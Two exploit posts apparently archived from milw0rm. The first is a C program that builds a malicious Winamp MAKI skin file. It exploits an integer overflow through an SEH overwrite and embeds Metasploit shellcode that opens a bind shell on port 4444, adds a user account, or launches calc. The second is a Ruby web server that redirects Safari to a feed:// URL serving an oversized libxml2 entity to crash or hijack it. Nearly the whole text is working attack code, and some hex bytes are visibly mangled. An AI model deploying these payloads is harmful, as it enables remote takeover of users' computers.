/**************************************************************
Winamp 5.551 MAKI Parsing Integer Overflow Exploit !!!

Tested on :Vista sp1 and Xpsp3
Release Date :May 22 2009
Venders web site :http://www.winamp.com/
Version Tested:Winamp 5.551
Not vulnerable :Winamp 5.552

Credits to Monica Sojeong Hong down at vrt-sourcefire for the overflow.
http://vrt-sourcefire.blogspot.com

As we know we are able to overwrite the exception handlers so
we can exploit this on multiple OS i tested these on xpsp3 <eng>
<Vista sp1> And all worked fine.

I wrote the exploits because i had tried the 2 exploits posted
on milw0rm they were tested on winxp sp3 and vista sp1 and i couldn't
get them to execute shell code which prompted me into writing my
own version!!

Below i have provided a look into the disassembly of the new
changes in the 555.2 version of winamp the main change was in
gen_ff.dll.

—snip–

A quick look at the new gen_ff.dll.
———————————-
loc_12094F62:
mov     ax, [ebx]
movzx   edi, ax       -Extends ax into edi register.-
inc     ebx
push    edi             ; Size
inc     ebx
lea     eax, [ebp+MultiByteStr]
push    ebx             ; Src
push    eax             ; Dst
call    memmove
————————
loc_120951E9:
mov     edi, [ebx]
add     ebx, 4
mov     ax, [ebx]
movzx   esi, ax        -Extends ax into esi register.-
inc     ebx
push    esi             ; Size
inc     ebx
lea     eax, [ebp+var_2014C]  <– This was also changed.
push    ebx             ; Src
push    eax             ; Dst
call    memmove

This is a simple run down of the new patch
that was applied to winamp winamp 5.552 If we look closely we can see they
changed the sign extension.


=555.1 .dll=
———-
movsx esi, ax  = movsx(dest , source );
Copies source operand dest and extends the value.


Changed in the new gen_ff.dll.
=555.2 .dll=
———-
movzx esi, ax

Zero extend the 8 bit registers.
Copies data and sign extends the data while copying it.

Destination= 16 – 32 bit.
Source =     8 or a 16byte or maybe even 1 byte of memory
Source =     the destination must be of greater value than the source.

This was a few of the changes within the new dll from winamp.Im
sure if you want to dig deeper you can get both dll and compare them
to see the changes that are made.So basically they have changed the
instruction from Copy with sign extension to copy with zero extension.

This can also be displayed when looking at the stack at the time of the
exception in the new version of winamp after steeping through the exception
although we can cause and exception we cant overwrite the 4 bytes on the
stack we can only overwrite 2 and it is always capped with 00FF.

—snip–

Special thanks to str0ke

Credits to n00b for writing exploit code !!
Progression is always a good thing.
———-
Disclaimer
———-
The information in this advisory and any of its
demonstrations is provided "as is" without any
warranty of any kind.

I am not liable for any direct or indirect damages
caused as a result of using the information or
demonstrations provided in any part of this advisory.
Educational use only..!!

***************************************************************/

#include <stdio.h>
#define MAKI "mcvcore.maki"



unsigned char First_Header[] =
{
    0×46, 0×47, 0×03, 0×04, 0×17, 0×00, 0×00, 0×00, 0×2A, 0×00, 0×00, 0×00,
    0×71, 0×49, 0×65, 0×51, 0×87, 0×0D, 0×51, 0×4A, 0×91, 0xE3, 0xA6, 0xB5,
    0×32, 0×35, 0xF3, 0xE7, 0×64, 0×0F, 0xF5, 0xD6, 0xFA, 0×93, 0xB7, 0×49,
    0×93, 0xF1, 0xBA, 0×66, 0xEF, 0xAE, 0×3E, 0×98, 0×7B, 0xC4, 0×0D, 0xE9,
    0×0D, 0×84, 0xE7, 0×4A, 0xB0, 0×2C, 0×04, 0×0B, 0xD2, 0×75, 0xF7, 0xFC,
    0xB5, 0×3A, 0×02, 0xB2, 0×4D, 0×43, 0xA1, 0×4B, 0xBE, 0xAE, 0×59, 0×63,
    0×75, 0×03, 0xF3, 0xC6, 0×78, 0×57, 0xC6, 0×87, 0×43, 0xE7, 0xFE, 0×49,
    0×85, 0xF9, 0×09, 0xCC, 0×53, 0×2A, 0xFD, 0×56, 0×65, 0×36, 0×60, 0×38,
    0×1B, 0×46, 0xA7, 0×42, 0xAA, 0×75, 0xD8, 0×3F, 0×66, 0×67, 0xBF, 0×73,
    0xF4, 0×7A, 0×78, 0xF4, 0xBB, 0xB2, 0xF7, 0×4E, 0×9C, 0xFB, 0xE7, 0×4B,
    0xA9, 0xBE, 0xA8, 0×8D, 0×02, 0×0C, 0×37, 0×3A, 0xBF, 0×3C, 0×9F, 0×43,
    0×84, 0xF1, 0×86, 0×88, 0×5B, 0xCF, 0×1E, 0×36, 0xB6, 0×5B, 0×0C, 0×5D,
    0xE1, 0×7D, 0×1F, 0×4B, 0xA7, 0×0F, 0×8D, 0×16, 0×59, 0×94, 0×19, 0×41,
    0×99, 0xE1, 0xE3, 0×4E, 0×36, 0xC6, 0xEC, 0×4B, 0×97, 0xCD, 0×78, 0xBC,
    0×9C, 0×86, 0×28, 0xB0, 0xE5, 0×95, 0xBE, 0×45, 0×72, 0×20, 0×91, 0×41,
    0×93, 0×5C, 0xBB, 0×5F, 0xF9, 0xF1, 0×17, 0xFD, 0×4E, 0×6D, 0×90, 0×60,
    0×7E, 0×53, 0×2E, 0×48, 0xB0, 0×04, 0xCC, 0×94, 0×61, 0×88, 0×56, 0×72,
    0xC0, 0xBC, 0×3A, 0×40, 0×22, 0×6F, 0xD6, 0×4B, 0×8B, 0xA4, 0×10, 0xC8,
    0×29, 0×93, 0×25, 0×47, 0×4D, 0×3E, 0xAA, 0×97, 0xD0, 0xF4, 0xA8, 0×4F,
    0×81, 0×7B, 0×0D, 0×0A, 0xF2, 0×2A, 0×45, 0×49, 0×83, 0xFA, 0xBB, 0xE4,
    0×64, 0xF4, 0×81, 0xD9, 0×49, 0xB0, 0xC0, 0xA8, 0×5B, 0×2E, 0xC3, 0xBC,
    0xFD, 0×3F, 0×5E, 0xB6, 0×62, 0×5E, 0×37, 0×8D, 0×40, 0×8D, 0xEA, 0×76,
    0×81, 0×4A, 0xB9, 0×1B, 0×77, 0xBE, 0×97, 0×4F, 0xCE, 0xB0, 0×77, 0×19,
    0×4E, 0×99, 0×56, 0xD4, 0×98, 0×33, 0xC9, 0×6C, 0×27, 0×0D, 0×20, 0xC2,
    0xA8, 0xEB, 0×51, 0×2A, 0×4B, 0xBA, 0×7F, 0×5D, 0×4B, 0xC6, 0×5D, 0×4C,
    0×71, 0×38, 0xBA, 0×1E, 0×8D, 0×9E, 0×48, 0×3E, 0×48, 0xB9, 0×60, 0×8D,
    0×1F, 0×43, 0xC5, 0xC4, 0×05, 0×40, 0xC9, 0×08, 0×0F, 0×39, 0xAF, 0×23,
    0×4B, 0×80, 0xF3, 0xB8, 0xC4, 0×8F, 0×7E, 0xBB, 0×59, 0×72, 0×86, 0xAA,
    0xEF, 0×0E, 0×31, 0xFA, 0×41, 0xB7, 0xDC, 0×85, 0xA9, 0×52, 0×5B, 0xCB,
    0×4B, 0×44, 0×32, 0xFD, 0×7D, 0×51, 0
x37, 0×7C, 0×4E, 0xBF, 0×40, 0×82,
    0xAE, 0×5F, 0×3A, 0xDC, 0×33, 0×15, 0xFA, 0xB9, 0×5A, 0×7D, 0×9A, 0×57,
    0×45, 0xAB, 0xC8, 0×65, 0×57, 0xA6, 0xC6, 0×7C, 0xA9, 0xCD, 0xDD, 0×8E,
    0×69, 0×1E, 0×8F, 0xEC, 0×4F, 0×9B, 0×12, 0xF9, 0×44, 0xF9, 0×09, 0xFF,
    0×45, 0×27, 0xCD, 0×64, 0×6B, 0×26, 0×5A, 0×4B, 0×4C, 0×8C, 0×59, 0xE6,
    0xA7, 0×0C, 0xF6, 0×49, 0×3A, 0xE4, 0×05, 0xCB, 0×6D, 0xC4, 0×8A, 0xC2,
    0×48, 0xB1, 0×93, 0×49, 0xF0, 0×91, 0×0E, 0xF5, 0×4A, 0xFF, 0xCF, 0xDC,
    0xB4, 0xFE, 0×81, 0xCC, 0×4B, 0×96, 0×1B, 0×72, 0×0F, 0xD5, 0xBE, 0×0F,
    0xFF, 0xE1, 0×8C, 0xE2, 0×01, 0×59, 0xB0, 0xD5, 0×11, 0×97, 0×9F, 0xE4,
    0xDE, 0×6F, 0×51, 0×76, 0×0D, 0×0A, 0xBD, 0xF8, 0xF0, 0×80, 0xA5, 0×1B,
    0xA6, 0×42, 0xA0, 0×93, 0×32, 0×36, 0xA0, 0×0C, 0×8D, 0×4A, 0×1B, 0×34,
    0×2E, 0×9B, 0×98, 0×6C, 0xFA, 0×40, 0×8B, 0×85, 0×0C, 0×1B, 0×6E, 0xE8,
    0×94, 0×05, 0×71, 0×9B, 0xD5, 0×36, 0xFD, 0×03, 0xF8, 0×4A, 0×97, 0×95,
    0×05, 0×02, 0xB7, 0xDB, 0×26, 0×7A, 0×10, 0xF2, 0xD5, 0×7F, 0xC4, 0xAC,
    0xDF, 0×48, 0xA6, 0xA0, 0×54, 0×51, 0×57, 0×6C, 0xDC, 0×76, 0×35, 0xA5,
    0xBA, 0xB5, 0xB3, 0×05, 0xCB, 0×4D, 0xAD, 0xC1, 0xE6, 0×18, 0xD2, 0×8F,
    0×68, 0×96, 0xC1, 0xFE, 0×29, 0×61, 0xB7, 0xDA, 0×51, 0×4D, 0×91, 0×65,
    0×01, 0xCA, 0×0C, 0×1B, 0×70, 0xDB, 0xF7, 0×14, 0×95, 0xD5, 0×36, 0xED,
    0xE8, 0×45, 0×98, 0×0F, 0×3F, 0×4E, 0xA0, 0×52, 0×2C, 0xD9, 0×82, 0×4B,
    0×3B, 0×9B, 0×7A, 0×66, 0×0E, 0×42, 0×8F, 0xFC, 0×79, 0×41, 0×15, 0×80,
    0×9C, 0×02, 0×99, 0×31, 0xED, 0xC7, 0×19, 0×53, 0×98, 0×47, 0×98, 0×63,
    0×60, 0xB1, 0×5A, 0×29, 0×8C, 0xAA, 0×4D, 0xC1, 0xBB, 0xE2, 0xF6, 0×84,
    0×73, 0×41, 0xBD, 0xB3, 0xB2, 0xEB, 0×2F, 0×66, 0×55, 0×50, 0×94, 0×05,
    0xC0, 0×73, 0×1F, 0×96, 0×1B, 0×40, 0×9B, 0×1B, 0×67, 0×24, 0×27, 0xAC,
    0×41, 0×65, 0×22, 0xBA, 0×3D, 0×59, 0×77, 0xD0, 0×76, 0×49, 0xB9, 0×52,
    0xF4, 0×71, 0×36, 0×55, 0×40, 0×0B, 0×82, 0×02, 0×03, 0xD4, 0xAB, 0×3A,
    0×87, 0×4D, 0×87, 0×8D, 0×12, 0×32, 0×6F, 0xAD, 0xFC, 0xD5, 0×83, 0xC2,
    0xDE, 0×24, 0×6E, 0xB7, 0×36, 0×4A, 0×8C, 0xCC, 0×9E, 0×24, 0xC4, 0×6B,
    0×6C, 0×73, 0×37, 0×00
};

/*Trigger the Integer overflow*/
unsigned char Exception [] =
{
    0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
    0xFF, 0xFF, 0xFF
};


/* win32_exec -  EXITFUNC=seh CMD=Calc Size=343
Encoder=PexAlphaNum http://metasploit.com */

char Calc_ShellCode [] =
    "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
    "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
    "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
    "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
    "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44"
    "\x42\x50\x42\x30\x42\x50\x4b\x58\x45\x34\x4e\x43\x4b\x48\x4e\x37"
    "\x45\x50\x4a\x37\x41\x30\x4f\x4e\x4b\x58\x4f\x34\x4a\x41\x4b\x58"
    "\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x44\x4b\x48\x46\x43\x4b\x38"
    "\x41\x30\x50\x4e\x41\x53\x42\x4c\x49\x39\x4e\x4a\x46\x48\x42\x4c"
    "\x46\x47\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x50\x44\x4c\x4b\x4e"
    "\x46\x4f\x4b\x43\x46\x55\x46\x42\x46\x50\x45\x37\x45\x4e\x4b\x48"
    "\x4f\x35\x46\x52\x41\x30\x4b\x4e\x48\x46\x4b\x38\x4e\x30\x4b\x54"
    "\x4b\x58\x4f\x35\x4e\x51\x41\x30\x4b\x4e\x4b\x38\x4e\x41\x4b\x58"
    "\x41\x30\x4b\x4e\x49\x58\x4e\x55\x46\x52\x46\x50\x43\x4c\x41\x43"
    "\x42\x4c\x46\x46\x4b\x38\x42\x54\x42\x33\x45\x38\x42\x4c\x4a\x57"
    "\x4e\x50\x4b\x58\x42\x54\x4e\x50\x4b\x48\x42\x37\x4e\x31\x4d\x4a"
    "\x4b\x48\x4a\x56\x4a\x30\x4b\x4e\x49\x30\x4b\x48\x42\x48\x42\x4b"
    "\x42\x30\x42\x50\x42\x50\x4b\x58\x4a\x46\x4e\x43\x4f\x45\x41\x33"
    "\x48\x4f\x42\x46\x48\x35\x49\x48\x4a\x4f\x43\x38\x42\x4c\x4b\x57"
    "\x42\x35\x4a\x56\x42\x4f\x4c\x38\x46\x50\x4f\x55\x4a\x46\x4a\x49"
    "\x50\x4f\x4c\x48\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x34\x41\x36"
    "\x4e\x46\x43\x36\x42\x50\x5a";

/* win32_bind -  EXITFUNC=seh LPORT=4444 Size=709
Encoder=PexAlphaNum http://metasploit.com */

char Bind_Shellcode [] =
    "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
    "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
    "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
    "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
    "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x46\x4b\x4e"
    "\x4d\x34\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x36\x4b\x48"
    "\x4e\x36\x46\x52\x46\x42\x4b\x58\x45\x54\x4e\x43\x4b\x38\x4e\x47"
    "\x45\x50\x4a\x57\x41\x30\x4f\x4e\x4b\x58\x4f\x44\x4a\x41\x4b\x48"
    "\x4f\x55\x42\x52\x41\x50\x4b\x4e\x49\x34\x4b\x48\x46\x33\x4b\x58"
    "\x41\x50\x50\x4e\x41\x53\x42\x4c\x49\x49\x4e\x4a\x46\x38\x42\x4c"
    "\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x30\x44\x4c\x4b\x4e"
    "\x46\x4f\x4b\x53\x46\x55\x46\x42\x4a\x42\x45\x47\x45\x4e\x4b\x48"
    "\x4f\x35\x46\x42\x41\x50\x4b\x4e\x48\x56\x4b\x38\x4e\x30\x4b\x54"
    "\x4b\x48\x4f\x55\x4e\x31\x41\x30\x4b\x4e\x43\x50\x4e\x42\x4b\x38"
    "\x49\x48\x4e\x56\x46\x42\x4e\x31\x41\x56\x43\x4c\x41\x33\x4b\x4d"
    "\x46\x56\x4b\x48\x43\x34\x42\x33\x4b\x48\x42\x44\x4e\x30\x4b\x48"
    "\x42\x57\x4e\x31\x4d\x4a\x4b\x38\x42\x34\x4a\x30\x50\x45\x4a\x46"
    "\x50\x38\x50\x44\x50\x50\x4e\x4e\x42\x35\x4f\x4f\x48\x4d\x48\x56"
    "\x43\x45\x48\x36\x4a\x36\x43\x53\x44\x53\x4a\x56\x47\x57\x43\x37"
    "\x44\x53\x4f\x45\x46\x55\x4f\x4f\x42\x4d\x4a\x46\x4b\x4c\x4d\x4e"
    "\x4e\x4f\x4b\x33\x42\x55\x4f\x4f\x48\x4d\x4f\x35\x49\x58\x45\x4e"
    "\x48\x56\x41\x48\x4d\x4e\x4a\x50\x44\x30\x45\x55\x4c\x56\x44\x30"
    "\x4f\x4f\x42\x4d\x4a\x46\x49\x4d\x49\x30\x45\x4f\x4d\x4a\x47\x45"
    "\x4f\x4f\x48\x4d\x43\x55\x43\x55\x43\x35\x43\x55\x43\x55\x43\x54"
    "\x43\x55\x43
\x34\x43\x55\x4f\x4f\x42\x4d\x48\x56\x4a\x46\x41\x51"
    "\x4e\x55\x48\x46\x43\x45\x49\x48\x41\x4e\x45\x49\x4a\x36\x46\x4a"
    "\x4c\x31\x42\x47\x47\x4c\x47\x45\x4f\x4f\x48\x4d\x4c\x56\x42\x41"
    "\x41\x55\x45\x45\x4f\x4f\x42\x4d\x4a\x36\x46\x4a\x4d\x4a\x50\x42"
    "\x49\x4e\x47\x45\x4f\x4f\x48\x4d\x43\x35\x45\x35\x4f\x4f\x42\x4d"
    "\x4a\x36\x45\x4e\x49\x34\x48\x58\x49\x54\x47\x45\x4f\x4f\x48\x4d"
    "\x42\x55\x46\x45\x46\x55\x45\x35\x4f\x4f\x42\x4d\x43\x49\x4a\x36"
    "\x47\x4e\x49\x47\x48\x4c\x49\x47\x47\x55\x4f\x4f\x48\x4d\x45\x55"
    "\x4f\x4f\x42\x4d\x48\x46\x4c\x56\x46\x46\x48\x36\x4a\x56\x43\x46"
    "\x4d\x36\x49\x38\x45\x4e\x4c\x56\x42\x35\x49\x55\x49\x32\x4e\x4c"
    "\x49\x38\x47\x4e\x4c\x46\x46\x44\x49\x58\x44\x4e\x41\x43\x42\x4c"
    "\x43\x4f\x4c\x4a\x50\x4f\x44\x54\x4d\x32\x50\x4f\x44\x54\x4e\x42"
    "\x43\x39\x4d\x48\x4c\x57\x4a\x43\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x56"
    "\x44\x57\x50\x4f\x43\x4b\x48\x51\x4f\x4f\x45\x47\x46\x44\x4f\x4f"
    "\x48\x4d\x4b\x35\x47\x45\x44\x55\x41\x45\x41\x45\x41\x55\x4c\x36"
    "\x41\x30\x41\x35\x41\x45\x45\x35\x41\x55\x4f\x4f\x42\x4d\x4a\x46"
    "\x4d\x4a\x49\x4d\x45\x50\x50\x4c\x43\x55\x4f\x4f\x48\x4d\x4c\x36"
    "\x4f\x4f\x4f\x4f\x47\x33\x4f\x4f\x42\x4d\x4b\x48\x47\x45\x4e\x4f"
    "\x43\x58\x46\x4c\x46\x36\x4f\x4f\x48\x4d\x44\x35\x4f\x4f\x42\x4d"
    "\x4a\x56\x42\x4f\x4c\x48\x46\x30\x4f\x45\x43\x35\x4f\x4f\x48\x4d"
    "\x4f\x4f\x42\x4d\x5a";

/* win32_adduser -  PASS=n00b EXITFUNC=seh USER=n00b Size=489
Encoder=PexAlphaNum http://metasploit.com */

char Add_User_Shellcode [] =
    "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
    "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
    "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
    "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
    "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x54"
    "\x42\x50\x42\x30\x42\x30\x4b\x38\x45\x54\x4e\x33\x4b\x48\x4e\x57"
    "\x45\x30\x4a\x57\x41\x30\x4f\x4e\x4b\x58\x4f\x44\x4a\x51\x4b\x38"
    "\x4f\x35\x42\x42\x41\x50\x4b\x4e\x49\x44\x4b\x38\x46\x43\x4b\x48"
    "\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x39\x4e\x4a\x46\x38\x42\x4c"
    "\x46\x47\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e"
    "\x46\x4f\x4b\x33\x46\x55\x46\x32\x46\x50\x45\x47\x45\x4e\x4b\x58"
    "\x4f\x45\x46\x32\x41\x50\x4b\x4e\x48\x36\x4b\x48\x4e\x30\x4b\x44"
    "\x4b\x48\x4f\x45\x4e\x51\x41\x30\x4b\x4e\x4b\x58\x4e\x51\x4b\x58"
    "\x41\x30\x4b\x4e\x49\x48\x4e\x45\x46\x42\x46\x30\x43\x4c\x41\x43"
    "\x42\x4c\x46\x36\x4b\x38\x42\x44\x42\x53\x45\x48\x42\x4c\x4a\x47"
    "\x4e\x50\x4b\x48\x42\x34\x4e\x50\x4b\x58\x42\x37\x4e\x41\x4d\x4a"
    "\x4b\x58\x4a\x36\x4a\x50\x4b\x4e\x49\x50\x4b\x58\x42\x38\x42\x4b"
    "\x42\x30\x42\x30\x42\x50\x4b\x38\x4a\x46\x4e\x33\x4f\x35\x41\x43"
    "\x48\x4f\x42\x56\x48\x35\x49\x58\x4a\x4f\x43\x38\x42\x4c\x4b\x37"
    "\x42\x45\x4a\x46\x42\x4f\x4c\x38\x46\x50\x4f\x35\x4a\x46\x4a\x49"
    "\x50\x4f\x4c\x58\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x36\x4d\x56"
    "\x46\x56\x50\x52\x45\x36\x4a\x57\x45\x56\x42\x42\x4f\x32\x43\x46"
    "\x42\x52\x50\x56\x45\x46\x46\x57\x42\x42\x45\x57\x43\x37\x45\x36"
    "\x44\x57\x42\x32\x50\x46\x42\x43\x42\x53\x44\x56\x42\x42\x50\x36"
    "\x42\x53\x42\x43\x44\x36\x42\x42\x4f\x32\x41\x54\x46\x44\x46\x44"
    "\x42\x42\x48\x32\x48\x52\x42\x52\x50\x36\x45\x56\x46\x47\x42\x52"
    "\x4e\x56\x4f\x36\x43\x36\x41\x56\x4e\x56\x47\x56\x44\x57\x4f\x56"
    "\x45\x47\x42\x37\x42\x42\x41\x54\x46\x46\x4d\x56\x49\x46\x50\x56"
    "\x49\x46\x43\x57\x46\x57\x44\x37\x41\x56\x46\x37\x4f\x36\x44\x57"
    "\x43\x47\x42\x42\x50\x46\x42\x43\x42\x33\x44\x46\x42\x42\x4f\x52"
    "\x41\x44\x46\x44\x46\x44\x42\x30\x5a";


unsigned char Junk1 ='A';

int main()
{
    FILE *fp;
    int i;

    if ((fp = fopen(MAKI, "wb")) == NULL)
    {
        printf("File %s write error\n", MAKI);
        return(0);
    }

    for (i=0; i<sizeof(First_Header); i++)
        fputc(First_Header[i], fp);

    for (i=0; i<sizeof(Exception); i++)
        fputc(Exception[i], fp);

    for (i=0;i<16751;i++)
    {
        fwrite(&Junk1,1,1,fp);
    }
    fputs("\xeb\x06\x90\x90",fp);/*Pointer to next seh record */
    fputs("\x7C\x14\xF0\x12",fp);/*SE handler Universal adress 12F0147C */

    int input;


    printf("\n——————————————————");
    printf("\nWinamp 5.551 MAKI Parsing Integer Overflow Exploit !!!");
    printf("\n\nExploit created by n00b");
    printf( "\n[1]. Calc Shell_Code" );
    printf( "\n[2]. Bind Shell_Code on port 4444" );
    printf( "\n[3]. Add user Shell_Code" );
    printf( "\n[4]. To exit and cancel" );
    printf( "\nPlease chose your Shell_Code:" );
    scanf( "%d", &input );
    switch ( input )
    {
    case 1:
        for (i=0; i<sizeof(Calc_ShellCode); i++)
            fputc(Calc_ShellCode[i], fp);
        break;
    case 2:
        for (i=0; i<sizeof(Bind_Shellcode); i++)
            fputc(Bind_Shellcode[i], fp);
        break;
    case 3:
        for (i=0; i
<sizeof(Add_User_Shellcode); i++)
            fputc(Add_User_Shellcode[i], fp);
        break;
    case 4:
        return 0;
        break;
    }
    fclose(fp);
    return 0;
}

// milw0rm.com [2009-05-26]

#!/usr/bin/ruby
#
# Quick-n-dirty PoC for APPLE-SA-2009-05-12 ala CVE-2008-3529
# Safari RSS feed:// buffer overflow via libxml2 by KF of Digitalmunition and Netragard
# http://www.digitalmunition.com , http://www.netragard.com
#
# The application PubSubAgent quit unexpectedly.
#
# Process:         PubSubAgent [3764]
# Path:            /System/Library/Frameworks/PubSub.framework/Versions/A/Resources/PubSubAgent.app/Contents/MacOS/PubSubAgent
# Identifier:      PubSubAgent
# Version:         ??? (???)
# Code Type:       X86 (Native)
# Parent Process:  launchd [282]
#
# Date/Time:       2008-10-31 15:31:41.355 -0400
# OS Version:      Mac OS X 10.5.5 (9F33)
# Report Version:  6
#
# Exception Type:  EXC_BAD_ACCESS (SIGSEGV)
# Exception Codes: KERN_INVALID_ADDRESS at 0×0000000005050500
#
# Thread 0 crashed with X86 Thread State (32-bit):
#  eax: 0×41414141  ebx: 0×94580535  ecx: 0×00136150  edx: 0×05050500
#  edi: 0×00007000  esi: 0×00100000  ebp: 0xbfffe298  esp: 0xbfffe220
#   ss: 0×0000001f  efl: 0×00010206  eip: 0×94580605   cs: 0×00000017
#   ds: 0×0000001f   es: 0×0000001f   fs: 0×00000000   gs: 0×00000037
#  cr2: 0×05050500
#
# On Windows libxml2.dll provides all the fun since there is no PubSubAgent
#
# EAX 0131FB10 ASCII "AAAAAAAAAAA…"
# ECX 003D0270
# EDX 00000000
# EBX 41414141
# ESP 030FE6FC
# EBP 030FE918
# ESI 0131FB08 ASCII "AAAAAAAAAAA…"
# EDI 41414141
# EIP 7C919084 ntdll.7C919084
#
# 7C919084   8B0B             MOV ECX,DWORD PTR DS:[EBX]
# 7C919086   3B4F 04          CMP ECX,DWORD PTR DS:[EDI+4]


require 'webrick'
include WEBrick

# Thats right… no one is taking on water, this is public info (and has been for a while)!
# https://bugzilla.redhat.com/attachment.cgi?id=315480

XML_LOVE =
'<?xml version="1.0"?>' + "\n" +
'<!DOCTYPE longentity [' + "\n" +
'<!ELEMENT longentity (#PCDATA)>' + "\n" +
'<!ENTITY ' +
"A" * 1000 + " " +
'"ha"> ]>' + "\n" +
'<longentity location="&' +
"A" * 1000 +
';">text</longentity>' + "\n"

REDIR_LOVE =
'<meta http-equiv="REFRESH" content="0;url=feed://' + ARGV[0] + '/pwn">'

s = HTTPServer.new( ort => 80 )

class REDIRECT < HTTPServlet::AbstractServlet
def do_GET(req, res)
   res.body = REDIR_LOVE
   res['Content-Type'] = "text/html"
end
end

class XMLLOVER < HTTPServlet::AbstractServlet
def do_GET(req, res)
   res.body = XML_LOVE
   res['Content-Type'] = "text/xml"
end
end

s.mount("/", REDIRECT)
s.mount("/pwn", XMLLOVER)

trap("INT"){ s.shutdown }
s.start

# milw0rm.com [2009-05-26]